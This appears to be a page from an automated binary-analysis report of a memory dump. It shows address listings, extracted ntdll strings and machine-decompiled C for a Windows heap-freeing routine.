0x0259f495
0x0259f499
0x0259f499
0x0259f4a2
0x0259f4a6
0x0259f4aa
0x0259f4ae
0x025ae238
0x025ae238
0x0259f4c3
0x0259f4c3
0x025bc2c5
0x025bc2cf
0x025bc2d2
0x025d4327
0x025d4327
0x00000000
0x025d4327
0x025bc2d8
0x025bc2df
0x00000000
0x00000000
0x025bc2e5
0x025bc2eb
0x025bc2ee
0x025bc2f1
0x025bc2f3
0x025bc2f6
0x00000000
0x00000000
0x025bc2fc
0x025bc2ff
0x025bc302
0x025bc304
0x025bc30a
0x00000000
0x00000000
0x025bc310
0x025bc318
0x025bc31a
0x00000000
0x00000000
0x025bc320
0x025bc322
0x025bc325
0x00000000
0x00000000
0x025bc32b
0x025bc32e
0x025bc331
0x025bc333
0x025bc335
0x025bc37b
0x025bc383
0x025bc386
0x025bc388
0x025bc38a
0x025bc38c
0x025bc38f
0x025bc391
0x025bc391
0x025bc394
0x00000000
0x00000000
0x025f3c35
0x025f3c39
0x025f3c3b
0x025f3c3e
0x025f3c41
0x00000000
0x00000000
0x025f3c4a
0x025f3c4d
0x025f3c4f
0x025f3c51
0x00000000
0x00000000
0x025f3c5c
0x025f3c5f
0x00000000
0x00000000
0x025f3c68
0x025f3c6d
0x025f3c6e
0x025f3c6e
0x025bc39a
0x025bc39d
0x025bc39f
0x025bc3a4
0x025bc3a4
0x025bc3a4
0x025bc3a9
0x025bc3ac
0x025bc3b1
0x025f3dae
0x025f3dae
0x00000000
0x025bc3b7
0x025bc3b7
0x025bc3ba
0x025bc3bc
0x025f3c76
0x025f3c7a
0x025f3c7f
0x025f3c81
0x025f3c8d
0x025bc3cb
0x025bc3cd
0x025bc3d4
0x025bc3d8
0x025bc3da
0x025bc445
0x025bc445
0x025bc449
0x025bc44d
0x025f3caa
0x025f3cad
0x025f3cb0
0x025f3cb8
0x025f3cbe
0x025f3cc5
0x025f3cc9
0x025f3cce
0x00000000
0x00000000
0x025f3cd7
0x025f3cd9
0x025f3ce0
0x025f3ce7
0x025f3cec
0x025f3cee
0x00000000
0x00000000
0x025f3cf0
0x025f3cfd
0x025f3d05
0x025f3d0d
0x025f3d11
0x025f3d20
0x025f3d24
0x025f3d27
0x025f3d29
0x025f3d2c
0x025f3d2f
0x025f3d36
0x025f3d39
0x00000000
0x00000000
0x00000000
0x025f3d3f
0x025f3cdb
0x025f3cde
0x00000000
0x00000000
0x00000000
0x025f3cde
0x00000000
0x025f3caa
0x025bc453
0x025bc456
0x025bc458
0x025bc45b
0x025bc45d
0x025bc4e4
0x025bc4e7
0x025bc4ea
0x025f3dce
0x025f3dd3
0x025f3dda
0x025f3ddc
0x025f3dde
0x00000000
0x00000000
0x025f3de6
0x025f3ded
0x025f3df0
0x025f3df5
0x00000000
0x00000000
0x025f3df7
0x025f3dfa
0x025f3dfc
0x025f3e03
0x025f3e07
0x025f3e0c
0x025f3e0e
0x00000000
0x00000000
0x025f3e14
0x025f3e23
0x025f3e2a
0x025f3e32
0x025f3e36
0x025f3e43
0x025f3e4f
0x025f3e51
0x00000000
0x025f3e51
0x025f3dfe
0x025f3e01
0x00000000
0x00000000
0x00000000
0x025f3e01
0x025bc4f0
0x025bc4f0
0x025bc4f3
0x025bc4f5
0x025f3e5a
0x025f3e5a
0x00000000
0x025bc4f5
0x025bc463
0x025bc465
0x025f3d58
0x025f3d5a
0x025f3d5c
0x025f3d98
0x025f3da6
0x00000000
0x025f3da6
0x025f3d5e
0x025f3d64
0x00000000
0x00000000
0x025f3d6a
0x025f3d6f
0x025f3d74
0x025f3d74
0x025f3d79
0x025f3d7e
0x025f3d83
0x00000000
0x025f3d83
0x025bc46b
0x025bc46b
0x025bc46f
0x025bc471
0x025bc477
0x00000000
0x00000000
0x025bc480
0x025bc484
0x025bc489
0x00000000
0x00000000
0x025bc48f
0x025bc492
0x025bc494
0x025f3db8
0x025f3dbc
0x025f3dc1
0x025f3dc3
0x025bc4a3
0x025bc4b2
0x025bc4b9
0x025bc4c1
0x025bc4c5
0x025bc4d2
0x025bc4db
0x025bc4de
0x025bc4de
0x025bc4e0
0x00000000
0x025bc4e0
0x00000000
0x025f3dc9
0x025bc49a
0x025bc49d
0x00000000
0x00000000
0x00000000
0x025bc49d
0x025bc3de
0x025bc3e4
0x025bc3e7
0x025bc3ec
0x00000000
0x00000000
0x025bc3f2
0x025bc3f4
0x025f3c95
0x025f3c99
0x025f3c9e
0x025f3ca0
0x00000000
0x00000000
0x025f3ca2
0x025bc403
0x025bc405
0x025bc418
0x025bc420
0x025bc426
0x025bc42d
0x025bc434
0x025bc43a
0x025bc43f
0x025bc43f
0x025bc441
0x00000000
0x025bc441
0x025bc3fa
0x025bc3fd
0x00000000
0x00000000
0x00000000
0x025bc3fd
0x025f3c83
0x025f3c83
0x00000000
0x025f3c83
0x025bc3c2
0x025bc3c5
0x00000000
0x00000000
0x00000000
0x025bc3c5
0x025bc3b1
0x025bc337
0x025bc339
0x025bc33c
0x025bc33e
0x025f3bce
0x025f3bd3
0x025f3be7
0x00000000
0x025f3bec
0x025bc344
0x025bc348
0x025cc1a5
0x025cc1a9
0x025f3c08
0x025f3c0d
0x00000000
0x025f3c0d
0x025cc1b1
0x025cc1b1
0x025bc34e
0x025bc352
0x025d431f
0x025d431f
0x025bc371
0x025bc373
0x025bc375
0x025f3c17
0x025f3c1d
0x025f3c23
0x025f3c27
0x025f3c2d
0x025f3c2d
0x025f3c27
0x00000000
0x00000000
0x00000000
0x00000000
0x025bc375
0x0259f46f
0x025f3bc0
0x025f3bc0
0x00000000

Strings

d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 025F3D74
!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 025F3C08
sxsisol_SearchActCtxForDllName, xrefs: 025F3BCE
Internal error check failed, xrefs: 025F3D79
[%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 025F3BDF
@, xrefs: 0259F3FE
Status != STATUS_NOT_FOUND, xrefs: 025F3D6A

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
API String ID: 0-4103935307
Opcode ID: 60aa1fc028ee034566bc37b047ab91b50eea14403f56d7797aac4931deca33d1
Instruction ID: 9706ee063d7d733030d4119b58b740e11143c35d1b92da1d26a8ae02edeecae2
Opcode Fuzzy Hash: 60aa1fc028ee034566bc37b047ab91b50eea14403f56d7797aac4931deca33d1
Instruction Fuzzy Hash: F702A07090020AEFEB24CFA9C881ABEB7F5FF48704F10846EE556E7650E7749985CB18

Uniqueness

Uniqueness Score: -1.00%

Function 025BEE4C, Relevance: 8.1, Strings: 6, Instructions: 601
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E025BEE4C(void* __ebx, void* __edi, signed int _a4, unsigned int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* __esi;
				void* __ebp;
				signed int _t258;
				signed char _t259;
				signed int _t261;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed char _t279;
				intOrPtr _t281;
				signed int _t293;
				intOrPtr _t300;
				intOrPtr _t301;
				unsigned int _t307;
				signed char _t308;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				intOrPtr _t335;
				intOrPtr _t347;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed char _t363;
				signed int _t370;
				unsigned int _t380;
				signed int _t381;
				intOrPtr _t389;
				signed int _t401;
				intOrPtr _t403;
				void* _t410;
				signed int _t420;
				signed int _t421;
				unsigned int* _t426;
				signed int _t432;
				signed int _t442;
				intOrPtr _t444;
				signed int _t452;
				signed int _t456;
				intOrPtr _t457;
				void* _t472;
				signed int _t480;
				void* _t483;
				signed int _t484;
				intOrPtr _t486;
				signed short* _t487;
				signed short* _t488;
				unsigned int _t492;
				signed int _t493;

				_t493 = _a4;
				_v12 = 0;
				if(( *(_t493 + 0xd0) ^  *(_t493 + 0x58)) != 0) {
					return E025A7353(_t493, _a8, _a12);
				}
				if(_a16 != 0) {
					_t420 = _a8;
					__eflags =  *(_t420 + 2) & 0x00000008;
					if(( *(_t420 + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(_t493 + 0x120)) =  *((intOrPtr*)(_t493 + 0x120)) - 1;
						_t258 = E025C61B3(_t420,  &_v36,  &_v24);
						__eflags = _t258;
						if(_t258 != 0) {
							 *((intOrPtr*)(_t493 + 0x124)) =  *((intOrPtr*)(_t493 + 0x124)) - _v24;
						}
					}
					_a4 = _t420;
					L13:
					_t259 =  *((intOrPtr*)(_t420 + 6));
					__eflags = _t259;
					if(_t259 == 0) {
						_t421 = _t493;
						_v20 = _t493;
					} else {
						_t421 = (_t420 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t421;
						_v20 = _t421;
					}
					_t261 = _a4 + _a12 * 8;
					__eflags =  *((char*)(_t261 + 7)) - 3;
					_v24 = _t261;
					if( *((char*)(_t261 + 7)) == 3) {
						_t483 = _t261 + 8;
						E025AAB77(_t493, _t483);
						_v28 =  *((intOrPtr*)(_t483 + 0x10));
						 *((intOrPtr*)(_t421 + 0x30)) =  *((intOrPtr*)(_t421 + 0x30)) - 1;
						_v16 =  *(_t483 + 0x14);
						 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) - ( *(_t483 + 0x14) >> 0xc);
						 *(_t493 + 0xe0) =  *(_t493 + 0xe0) +  *(_t483 + 0x14);
						 *((intOrPtr*)(_t493 + 0xf0)) =  *((intOrPtr*)(_t493 + 0xf0)) - 1;
						__eflags =  *(_t483 + 0x14) - 0x7f000;
						if( *(_t483 + 0x14) >= 0x7f000) {
							_t102 = _t493 + 0xe4;
							 *_t102 =  *(_t493 + 0xe4) -  *(_t483 + 0x14);
							__eflags =  *_t102;
						}
						_a12 = _a12 + ( *(_t483 + 0x14) >> 3) + 0x20;
						_v12 = 1;
					} else {
						_t32 =  &_v16;
						 *_t32 = _v16 & 0x00000000;
						__eflags =  *_t32;
					}
					_t271 = _a4;
					__eflags =  *(_t271 + 4) ^  *(_t493 + 0x54);
					if(( *(_t271 + 4) ^  *(_t493 + 0x54)) == 0) {
						_t471 = _a4;
						_v8 = _a4;
						_t274 = E025E8C11(_t421, _a4);
						__eflags = _a16;
						_t484 = _t274;
						if(_a16 != 0) {
							__eflags = _t484;
							if(_t484 != 0) {
								goto L56;
							}
							goto L18;
						}
						L56:
						__eflags =  *0x26777b0 - 1;
						if( *0x26777b0 >= 1) {
							__eflags = _t484;
							if(_t484 == 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *((intOrPtr*)(_t347 + 0xc)) - _t484;
								if( *((intOrPtr*)(_t347 + 0xc)) == _t484) {
									_push("HEAP: ");
									E025E373B();
								} else {
									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E025E373B();
								E0263F826(_t421, _t471, _t484, _t493, 1);
							}
						}
						__eflags = _v12;
						_t275 = _a12;
						_t432 = _a4;
						if(_v12 != 0) {
							_t276 = _t432 + _t275 * 8;
						} else {
							_t130 = _t275 * 8; // -16
							_t276 = _t432 + _t130 - 0x10;
						}
						_t278 = (_t276 & 0xfffff000) - _v8;
						__eflags = _t278;
						_a8 = _t278;
						if(__eflags == 0) {
							L85:
							__eflags =  *0x26777b0 - 1;
							if( *0x26777b0 >= 1) {
								__eflags = _v12;
								if(_v12 != 0) {
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t281 + 0xc);
									if( *(_t281 + 0xc) == 0) {
										_push("HEAP: ");
										E025E373B();
									} else {
										E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push("(!TrailingUCR)");
									E025E373B();
									E0263F826(_t421, _t471, _t484, _t493, 1);
								}
							}
							goto L54;
						} else {
							_t293 = E025A4167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t293;
							if(_t293 < 0) {
								L89:
								_t472 = 3;
								E025A444F(_t493, _t472);
								__eflags = _v12;
								if(_v12 != 0) {
									E025AA96B(_t493, _t421, _v28 + 0xffffffe8, _v16, _a4,  &_a12);
								}
								L54:
								_push(_a12);
								_push(_a4);
								L12:
								_push(_t493);
								_t279 = E025A7353();
								L7:
								return _t279;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t300 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t300 + 0x240) & 0x00000001;
								if(( *(_t300 + 0x240) & 0x00000001) != 0) {
									E0263EFE0(_t493, _v8, _a8, 5);
								}
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t301 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t301 - 0x7f000;
							if(_t301 >= 0x7f000) {
								_t139 = _t493 + 0xe4;
								 *_t139 =  *(_t493 + 0xe4) - _t301;
								__eflags =  *_t139;
							}
							E025AAB77(_t493, _t484);
							 *((intOrPtr*)(_t484 + 0x14)) =  *((intOrPtr*)(_t484 + 0x14)) + _a8;
							E025AAA2C(_t493, _t484);
							 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) + (_a8 >> 0xc);
							_t307 = _a8;
							 *(_t493 + 0xe0) =  *(_t493 + 0xe0) - _t307;
							_t486 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t486 - 0x7f000;
							if(_t486 >= 0x7f000) {
								_t151 = _t493 + 0xe4;
								 *_t151 =  *(_t493 + 0xe4) + _t486;
								__eflags =  *_t151;
							}
							__eflags = _v12;
							if(_v12 != 0) {
								L73:
								_t308 =  *0x7ffe0380;
								__eflags = _t308;
								if(_t308 != 0) {
									__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E0263F48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, _v12, _v16, _t308 & 0x000000ff);
									}
								}
								_t279 =  *0x7ffe038a;
								__eflags = _t279;
								if(__eflags != 0) {
									_push(_t279 & 0x000000ff);
									_push(_v16);
									_push(_v12);
									L118:
									_push( *(_t493 + 0x78) << 3);
									_push(_a8);
									_push(_v8);
									_push(_t493);
									_t279 = E0263F48C(__eflags);
								}
								goto L7;
							} else {
								_t487 = _t307 + _v8;
								_t442 = _a4;
								_t487[2] =  *(_t493 + 0x54);
								_t317 = _a12;
								_t476 = _a8 + _v8;
								__eflags = _t442 + _t317 * 8 - _a8 + _v8;
								if(_t442 + _t317 * 8 == _a8 + _v8) {
									__eflags =  *(_t493 + 0x4c);
									if( *(_t493 + 0x4c) != 0) {
										_t487[1] = _t487[1] ^ _t487[0] ^  *_t487;
										 *_t487 =  *_t487 ^  *(_t493 + 0x50);
									}
									goto L73;
								}
								_t487[3] = 0;
								_t487[1] = 0;
								_t326 = (_a12 << 3) - _a8 >> 3;
								 *_t487 = _t326;
								__eflags =  *0x26777b0 - 1;
								if( *0x26777b0 >= 1) {
									__eflags = _t326 - 1;
									if(_t326 <= 1) {
										_t335 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t335 + 0xc);
										if( *(_t335 + 0xc) == 0) {
											_push("HEAP: ");
											E025E373B();
										} else {
											E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("((LONG)FreeEntry->Size > 1)");
										E025E373B();
										E0263F826(_t421, _t476, _t487, _t493, 1);
									}
								}
								_t487[1] = 0;
								_t444 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t444 - _t421;
								if(_t444 == _t421) {
									_t327 = 0;
								} else {
									_t327 = (_t487 - _t421 >> 0x10) + 1;
									_a16 = _t327;
									__eflags = _t327;
									if(__eflags <= 0) {
										L99:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t487);
										_push(_t444);
										_push(3);
										E0263F840(_t421, _t444, _t476, _t487, _t493, __eflags);
										_t327 = _a16;
										L72:
										_t487[3] = _t327;
										E025A7353(_t493, _t487,  *_t487 & 0x0000ffff);
										goto L73;
									}
									__eflags = _t327 - 0xfe;
									if(__eflags >= 0) {
										goto L99;
									}
								}
								goto L72;
							}
						}
					}
					L18:
					_t357 = _a4;
					_t38 = _t357 + 0x101f; // 0x101f
					_t484 = 0xfffff000;
					_t452 = _t38 & 0xfffff000;
					_t39 = _t357 + 0x28; // 0x28
					_v8 = _t452;
					__eflags = _t452 - _t39;
					if(_t452 == _t39) {
						_t452 = _t452 + 0x1000;
						_v8 = _t452;
					}
					__eflags = _v12;
					_t471 = _a12;
					if(_v12 != 0) {
						_t358 = _t357 + _t471 * 8;
					} else {
						_t358 = _t357 + _t471 * 8 - 0x10;
					}
					_t359 = _t358 & _t484;
					_a8 = _t359;
					__eflags = _t359 - _t452;
					if(_t359 < _t452) {
						goto L85;
					} else {
						_t360 = _t359 - _t452;
						__eflags = _a16;
						_a8 = _t360;
						if(_a16 != 0) {
							L26:
							__eflags = _t360;
							if(__eflags == 0) {
								L30:
								__eflags = _v12;
								if(_v12 != 0) {
									L38:
									E025AA96B(_t493, _t421, _t452 + 0xffffffe8, _t360, _a4,  &_v32);
									E025A7353(_t493, _a4, _v32);
									_t363 =  *0x7ffe0380;
									__eflags = _t363;
									if(_t363 != 0) {
										__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
										if(__eflags != 0) {
											E0263F48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, 0, 0, _t363 & 0x000000ff);
										}
									}
									_t279 =  *0x7ffe038a;
									__eflags = _t279;
									if(__eflags == 0) {
										goto L7;
									} else {
										_push(_t279 & 0x000000ff);
										_push(0);
										_push(0);
										goto L118;
									}
								}
								_t488 = _t360 + _t452;
								_t456 = _a4;
								_t488[2] =  *(_t493 + 0x54);
								_t370 = _a12;
								_t479 = _t456 + _t370 * 8;
								_t360 = _a8;
								_t452 = _v8;
								_t423 = _t360 + _t452;
								__eflags = _t456 + _t370 * 8 - _t360 + _t452;
								if(_t456 + _t370 * 8 == _t360 + _t452) {
									__eflags =  *(_t493 + 0x4c);
									_t421 = _v20;
									if( *(_t493 + 0x4c) != 0) {
										_t488[1] = _t488[1] ^ _t488[0] ^  *_t488;
										 *_t488 =  *_t488 ^  *(_t493 + 0x50);
										L37:
										_t360 = _a8;
										_t452 = _v8;
										goto L38;
									}
									goto L38;
								}
								_t488[3] = 0;
								_t488[1] = 0;
								_t380 = (_a12 << 3) - _a8 - _v8 + _a4 >> 3;
								 *_t488 = _t380;
								__eflags =  *0x26777b0 - 1;
								if( *0x26777b0 >= 1) {
									__eflags = _t380 - 1;
									if(_t380 <= 1) {
										_t389 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t389 + 0xc);
										if( *(_t389 + 0xc) == 0) {
											_push("HEAP: ");
											E025E373B();
										} else {
											E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("(LONG)FreeEntry->Size > 1");
										E025E373B();
										E0263F826(_t423, _t479, _t488, _t493, 1);
									}
								}
								_t421 = _v20;
								_t488[1] = 0;
								_t457 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t457 - _t421;
								if(_t457 == _t421) {
									_t381 = 0;
								} else {
									_t381 = (_t488 - _t421 >> 0x10) + 1;
									_a16 = _t381;
									__eflags = _t381;
									if(__eflags <= 0) {
										L113:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t488);
										_push(_t457);
										_push(3);
										E0263F840(_t421, _t457, _t479, _t488, _t493, __eflags);
										_t381 = _a16;
										L36:
										_t488[3] = _t381;
										E025A7353(_t493, _t488,  *_t488 & 0x0000ffff);
										goto L37;
									}
									__eflags = _t381 - 0xfe;
									if(__eflags >= 0) {
										goto L113;
									}
								}
								goto L36;
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t401 = E025A4167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t401;
							if(_t401 < 0) {
								goto L89;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t403 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t403 + 0x240) & 0x00000001;
								if(( *(_t403 + 0x240) & 0x00000001) != 0) {
									E0263EFE0(_t493, _v8, _a8, 6);
								}
							}
							_t360 = _a8;
							_t452 = _v8;
							goto L30;
						}
						_t471 = _v24;
						__eflags =  *((char*)(_t471 + 7)) - 3;
						if( *((char*)(_t471 + 7)) == 3) {
							goto L26;
						}
						__eflags = _t360;
						if(_t360 == 0) {
							goto L54;
						}
						__eflags = _t360 -  *((intOrPtr*)(_t493 + 0x70));
						if(_t360 <  *((intOrPtr*)(_t493 + 0x70))) {
							goto L54;
						}
						goto L26;
					}
				}
				_t480 = _a12;
				if(_t480 <  *((intOrPtr*)(_t493 + 0x70))) {
					L11:
					_push(_t480);
					_push(_a8);
					goto L12;
				}
				_t410 =  *(_t493 + 0x78) + _t480;
				if(_t410 <  *((intOrPtr*)(_t493 + 0x74)) || _t410 <  *(_t493 + 0xe0) >>  *((intOrPtr*)(_t493 + 0x130)) + 3) {
					goto L11;
				} else {
					_t420 = _a8;
					_a4 = E025A29B2(_t493, _t420,  &_a12, 0);
					_t413 = _a12;
					if(_a12 - 0x201 > 0xfbff) {
						goto L13;
					} else {
						E025A7353(_t493, _a4, _t413);
						_t492 =  *(_t493 + 0xe0) - ( *(_t493 + 0x78) << 3);
						_t279 =  *(_t493 + 0x128) - ( *(_t493 + 0x128) >> 3);
						if(_t492 < _t279) {
							_t426 = _t493 + 0x12c;
							_t279 =  *_t426 - ( *_t426 >> 3);
							__eflags = _t492 - _t279;
							if(_t492 > _t279) {
								_t279 = E025C6372(_t493);
								 *_t426 = _t492;
								 *(_t493 + 0x128) = _t492;
							}
						}
						goto L7;
					}
				}
			}

0x025bee55
0x025bee61
0x025bee65
0x00000000
0x025f9a54
0x025bee71
0x025e46f2
0x025e46f5
0x025e46f9
0x025f9a5e
0x025f9a70
0x025f9a75
0x025f9a77
0x025f9a80
0x025f9a80
0x025f9a77
0x025e46ff
0x025d9b97
0x025d9b97
0x025d9b9a
0x025d9b9c
0x025e8909
0x025e890b
0x025d9ba2
0x025d9bb0
0x025d9bb0
0x025d9bb6
0x025d9bb6
0x025d9bbf
0x025d9bc2
0x025d9bc6
0x025d9bc9
0x025d9de5
0x025d9dec
0x025d9df4
0x025d9dfa
0x025d9dfd
0x025d9e06
0x025d9e0c
0x025d9e12
0x025d9e18
0x025d9e1f
0x025d9e24
0x025d9e24
0x025d9e24
0x025d9e24
0x025d9e37
0x025d9e3a
0x025d9bcf
0x025d9bcf
0x025d9bcf
0x025d9bcf
0x025d9bcf
0x025d9bd3
0x025d9bda
0x025d9bde
0x025e8a98
0x025e8a9d
0x025e8aa0
0x025e8aa5
0x025e8aa9
0x025e8aab
0x025e8913
0x025e8915
0x00000000
0x00000000
0x00000000
0x025e891b
0x025e8ab1
0x025e8ab1
0x025e8ab8
0x025f9a8b
0x025f9a8d
0x025f9a99
0x025f9a9c
0x025f9a9f
0x025f9ac1
0x025f9ac6
0x025f9aa1
0x025f9ab9
0x025f9abe
0x025f9acc
0x025f9ad1
0x025f9ad9
0x025f9ad9
0x025f9a8d
0x025e8abe
0x025e8ac2
0x025e8ac5
0x025e8ac8
0x025e8c32
0x025e8ace
0x025e8ace
0x025e8ace
0x025e8ace
0x025e8ad7
0x025e8ad7
0x025e8ada
0x025e8add
0x025f9ae3
0x025f9ae3
0x025f9aea
0x025f9af0
0x025f9af4
0x025f9b00
0x025f9b03
0x025f9b07
0x025f9d7a
0x025f9d7f
0x025f9b0d
0x025f9b25
0x025f9b2a
0x025f9d85
0x025f9d8a
0x025f9d92
0x025f9d92
0x025f9af4
0x00000000
0x025e8ae3
0x025e8af2
0x025e8af7
0x025e8af9
0x025f9b30
0x025f9b32
0x025f9b35
0x025f9b3a
0x025f9b3e
0x025f9b57
0x025f9b57
0x025e8941
0x025e8941
0x025e8944
0x025d42da
0x025d42da
0x025d42db
0x025beefb
0x00000000
0x025beefc
0x025e8aff
0x025e8b06
0x025f9b67
0x025f9b6a
0x025f9b71
0x025f9b80
0x025f9b80
0x025f9b71
0x025e8b0c
0x025e8b12
0x025e8b15
0x025e8b1a
0x025e8b1c
0x025e8b1c
0x025e8b1c
0x025e8b1c
0x025e8b26
0x025e8b2e
0x025e8b35
0x025e8b40
0x025e8b43
0x025e8b46
0x025e8b4c
0x025e8b4f
0x025e8b55
0x025e8b57
0x025e8b57
0x025e8b57
0x025e8b57
0x025e8b5d
0x025e8b61
0x025e8bed
0x025e8bed
0x025e8bf2
0x025e8bf4
0x025f9c21
0x025f9c28
0x025f9c46
0x025f9c46
0x025f9c28
0x025e8bfa
0x025e8bff
0x025e8c01
0x025f9c53
0x025f9c54
0x025f9c57
0x025f9d62
0x025f9d68
0x025f9d69
0x025f9d6c
0x025f9d6f
0x025f9d70
0x025f9d70
0x00000000
0x025e8b67
0x025e8b6a
0x025e8b71
0x025e8b74
0x025e8b78
0x025e8b84
0x025e8b86
0x025e8b88
0x025e8920
0x025e8924
0x025f9c0a
0x025f9c10
0x025f9c10
0x00000000
0x025e8924
0x025e8b8e
0x025e8b92
0x025e8b9f
0x025e8ba2
0x025e8ba5
0x025e8bac
0x025f9b8a
0x025f9b8e
0x025f9b9a
0x025f9b9d
0x025f9ba1
0x025f9bc3
0x025f9bc8
0x025f9ba3
0x025f9bbb
0x025f9bc0
0x025f9bce
0x025f9bd3
0x025f9bdb
0x025f9bdb
0x025f9b8e
0x025e8bb2
0x025e8bb6
0x025e8bb9
0x025e8bbb
0x025f9be5
0x025e8bc1
0x025e8bc8
0x025e8bc9
0x025e8bcc
0x025e8bce
0x025f9bec
0x025f9bec
0x025f9bee
0x025f9bf0
0x025f9bf1
0x025f9bf2
0x025f9bf3
0x025f9bf5
0x025f9bfa
0x025e8bdf
0x025e8bdf
0x025e8be8
0x00000000
0x025e8be8
0x025e8bd4
0x025e8bd9
0x00000000
0x00000000
0x025e8bd9
0x00000000
0x025e8bbb
0x025e8b61
0x025e8add
0x025d9be4
0x025d9be4
0x025d9be7
0x025d9bed
0x025d9bf2
0x025d9bf4
0x025d9bf7
0x025d9bfa
0x025d9bfc
0x025f9c5f
0x025f9c65
0x025f9c65
0x025d9c02
0x025d9c06
0x025d9c09
0x025d9e43
0x025d9c0f
0x025d9c0f
0x025d9c0f
0x025d9c13
0x025d9c15
0x025d9c18
0x025d9c1a
0x00000000
0x025d9c20
0x025d9c20
0x025d9c22
0x025d9c26
0x025d9c29
0x025d9c45
0x025d9c45
0x025d9c47
0x025d9c7e
0x025d9c7e
0x025d9c82
0x025d9d1b
0x025d9d29
0x025d9d35
0x025d9d3a
0x025d9d3f
0x025d9d41
0x025f9d2d
0x025f9d34
0x025f9d50
0x025f9d50
0x025f9d34
0x025d9d47
0x025d9d4c
0x025d9d4e
0x00000000
0x025d9d54
0x025f9d5d
0x025f9d5e
0x025f9d60
0x00000000
0x025f9d60
0x025d9d4e
0x025d9c88
0x025d9c8f
0x025d9c92
0x025d9c96
0x025d9c99
0x025d9c9c
0x025d9c9f
0x025d9ca2
0x025d9ca5
0x025d9ca7
0x025e892f
0x025e8933
0x025e8936
0x025f9d16
0x025f9d1c
0x025d9d15
0x025d9d15
0x025d9d18
0x00000000
0x025d9d18
0x00000000
0x025e893c
0x025d9cad
0x025d9cb1
0x025d9cc4
0x025d9cc7
0x025d9cca
0x025d9cd1
0x025f9c96
0x025f9c9a
0x025f9ca6
0x025f9ca9
0x025f9cad
0x025f9ccf
0x025f9cd4
0x025f9caf
0x025f9cc7
0x025f9ccc
0x025f9cda
0x025f9cdf
0x025f9ce7
0x025f9ce7
0x025f9c9a
0x025d9cd7
0x025d9cda
0x025d9cde
0x025d9ce1
0x025d9ce3
0x025f9cf1
0x025d9ce9
